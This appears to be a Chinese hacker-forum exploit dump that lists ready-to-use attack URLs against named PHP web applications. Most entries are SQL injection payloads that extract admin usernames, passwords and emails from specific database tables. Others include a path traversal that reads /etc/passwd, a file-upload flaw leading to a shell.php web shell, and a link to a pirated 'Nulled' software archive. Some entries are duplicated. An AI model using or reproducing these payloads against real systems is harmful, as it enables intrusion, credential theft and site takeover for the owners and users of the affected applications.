利用方法：Www.(spookzang).Me/main.php?action=download&id=../../../../../../../../../../../../../../../etc/passwd

live

来源：wolvez
b.php

源码下载： www.hispah.com/demos/textlinksads


     利用方法：www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+admin_detail/*

源码下载：http://www.formfields.com/adManArea/adManPricing.php
dork    利用方法： www.Spookzang.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*

利用方法：www.Spookzang.Net/searchresults.php?catid=-1'/**/UNION/**/SELECT/**/0,0,CONCAT_WS(0x3a,username,password,email)MrSQL,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+tblusers/*

利用方法：http://www.(spookzang).Net/event_detail.php?event_id=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*

下载地址: http://nullstore.net/Reaper/4ptp1chdeais/BuzzyWall.v1.3.1.Nulled.rar   利用方法：

http://localhost/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*

源码下载： http://sourceforge.net/projects/fossgallery/


  
漏洞：processfiles.Php可直接上传php文件。

上传后地址：http://www.(Spookzang).Net/shell.php

源码下载： http://sourceforge.net/projects/fossgallery/


  
漏洞：processfiles.Php可直接上传php文件。

上传后地址：http://www.(Spookzang).Net/shell.php

利用方法：

http://www.Spookzang.Net/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,null,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users